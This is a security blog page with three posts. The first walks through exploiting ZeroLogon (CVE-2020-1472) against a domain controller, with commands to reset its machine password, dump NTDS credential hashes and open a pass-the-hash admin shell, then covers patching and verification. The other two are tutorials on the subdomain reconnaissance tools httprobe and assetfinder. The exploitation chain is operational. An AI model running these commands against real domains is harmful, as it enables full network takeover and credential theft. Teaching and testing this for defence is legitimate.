ZeroLogon – How to Exploit and Mitigate

Information about vulnerability

The vulnerability I will discuss in this post it the famous ZeroLogon vulnerability(CVE-2020-1472). By exploiting the vulnerability any attacker with network access to domain controller can take complete control of a windows domain very quick and easy.

I will start off by showing you how easy you can exploit the vulnerability. Then I will continue by showing you how you can protect your domain controllers and finally I will show you how you can verify that your domain controllers have the correct fixes in place.

How to exploit the vulnerability

We will use the script by Risksense to exploit the vulnerability. To be able to run it you will need to have the Impacket library installed on your machine. If you don’t have it installed you can simply install it by following the steps below.

cd /opt/
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket/
pip3 install .
python3 setup.py install


We will then download the ZeroLogon script from Risksense.

cd /opt
git clone https://github.com/risksense/zerologon.git
cd zerologon/

Now it’s time to exploit. We need the name of the domain, the name of the DC and the IP address. For this example we will use the following information for this made up target:

  • Name of domain: LETMEIN
  • Name of DC: SECRET-DC
  • IP address of DC: 192.168.1.10

Run the script:

python3 set_empty_pw.py SECRET-DC 192.168.1.10

The DC should now have an empty string as its machine password. You can now use a tool of your choice to get out the info you want from the DC. You can for example use secretsdump.py that is included in the impacket library.

Dump credentials:
secretdump.py -just-dc LETMEIN/SECRET-DC\$192.168.1.10

Then press enter when prompted for password since it is supposed to be empty and voila. You should now see the user hashes from the NTDS.DIT.

Now you can easily find a Domain Admin like for example “LETMEIN\Administrator” and use another tool to create a shell. We will use another impacket tool for that, wmiexec.py. So all you need to do is to copy the hash that you got from secretdump.py.

Create shell to domain controller:
wmiexec.py LETMEIN\Administrator@192.168.1.10 -hashes *hashfromsecretdump.py*

You now have a shell on the domain controller. You own it and can do what you want.

Microsofts fix for this vulnerability

So, how can we now mitigate that a hacker exploits this in our own domain? Microsoft released information on how you can fix this. The first step is to install the patch and then set the FullSecureChannelProtection registry key to 1.

Instructions can be found on Microsofts website:
https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc

Hopefully you already installed the patches back in august and applied the reg key the same day as Microsoft sent out the information.

How to verify the fix

How can you make sure that you did everything right while applying Microsofts fixes? To test it you can use the Zerologon tester script by Secura. The script also uses Impacket library to test if the vulnerability remains.

How to install:
cd /opt
git clone https://github.com/SecuraBV/CVE-2020-1472.git
cd CVE-2020-1472
pip install -r requirements.txt


Run the script:
zerologon_tester.py SECRET-DC 192.168.1.10

That’s it, a super critical vulnerability that is extremely easy to exploit. Make sure that you always patch your stuff and do it quickly. ASAP is not enough 🙂

If you have any questions you can contact me on twitter (@tzusec).
// Rickard

Httprobe

This post is about httprobe which is a tool for quickly probing for active http and https servers. If you have a list with subdomains you can quickly check which are active by using this tool. Httprobe is available on Github and the tool was created by Tom Hudson (@tomnomnom on Twitter).

Pre requisites:
1. You need to have Golang installed. If you haven’t used golang before and need help to get started, read my guide on how to install Golang on Kali Linux

2. Download ‘httprobe’ by running
go get -u github.com/tomnomnom/httprobe

3. If you used my guide to install Go you can now find ‘httprobe’ at:
/root/go-workspace/bin/assetfinder

Basic usage:
To use httprobe you need to print out your domains and pipe them to httprobe. In the example below we are are using cat to read the data from domains.txt and gives its content as output to httprobe.
cat domains.txt | httprobe

Adding extra ports:
By default httprobe is probing for http on port 80 and https on port 443. We can add other ports by using the ‘-p’ parameter.
cat domains.txt | httprobe -p http:8080 -p https:8443

Skip default ports and only probe for defined ports:
By adding ‘-s’ parameter the default ports will be ignored.
cat domains.txt | httprobe -s -p http:8080 -p https:8443

Specify a timeout:
If you know that the response time on the target server might be high you can specify a custom timeout by using the ‘-t’ parameter. The time is configured in milliseconds.
cat domains.txt | httprobe -t 10000

Combine with other tools:
You can combine ‘httprobe’ with other tools such as ‘assetfinder’. If you don’t know about assetfinder you can read my earlier post that helps you getting started with assetfinder.

One example on how you can chain assetfinder with httprobe.
assetfinder --subs-only yahoo.com | httprobe -s -p http:80
In the example we first searched for subdomains at yahoo.com and piped the result to httprobe to find out which of the subdomains that were listening on port 80.
assetfinder+httprobe

Assetfinder

reconnaissance

In this post I will write a bit about Assetfinder which is an quick and awesome tool for finding subdomains. The tool is available in Github and was created by Tom Hudson (@tomnomnom on Twitter).

According to the information on Github, Assetfinder uses the following resources to find subdomains

  • crt.sh
  • certspotter
  • hackertarget
  • threatcrowd
  • wayback machine
  • dns.bufferover.run
  • facebook
  • virustotal
  • findsubdomains

Pre requisites:
1. You need to have Golang installed. If you haven’t used golang before and need help to get started, read my guide on how to install Golang on Kali Linux

2. Download assetfinder by running the following command.
go get -u github.com/tomnomnom/assetfinder

3. If you used my guide to install Go you can now find assetfinder at:
/root/go-workspace/bin/assetfinder

How to use Assetfinder:
Navigate to assetfinder and run
./assetfinder exampledomain.com
If you only want the subdomains you can add –subs-only.
./assetfinder --subs-only exampledomain.com

assetfinder --subs-only
Save the output to a file:
You can also save the output to a file by adding “> filename”
./assetfinder --subs-only exampledomain.com > domains

Assetfinder - Save output

The tool is really quick so it is perfect to use it when you want a fast way to find subdomains for a target company. I really love this tool. <3

Copyright © 2022